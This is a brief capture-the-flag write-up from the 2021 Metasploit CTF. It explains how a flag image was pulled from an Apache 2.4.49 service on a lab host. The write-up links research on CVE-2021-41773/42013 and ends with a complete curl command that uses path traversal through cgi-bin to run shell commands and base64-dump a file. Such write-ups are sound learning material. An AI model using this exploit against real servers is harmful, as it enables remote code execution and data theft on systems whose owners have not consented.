Metasploit 2021

10 of clubs

Solved by: Starry-Lord

port 12380

This port was using Apache httpd 2.4.49 and I found a good research on the subject here:

https://blog.qualys.com/vulnerabilities-threat-research/2021/10/27/apache-http-server-path-traversal-remote-code-execution-cve-2021-41773-cve-2021-42013

I didn’t need to get a shell. ls and cat commands were enough to extract the png:

curl -vv 'http://172.17.15.117:12380/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo; cat ../secret/safe/flag.png|base64'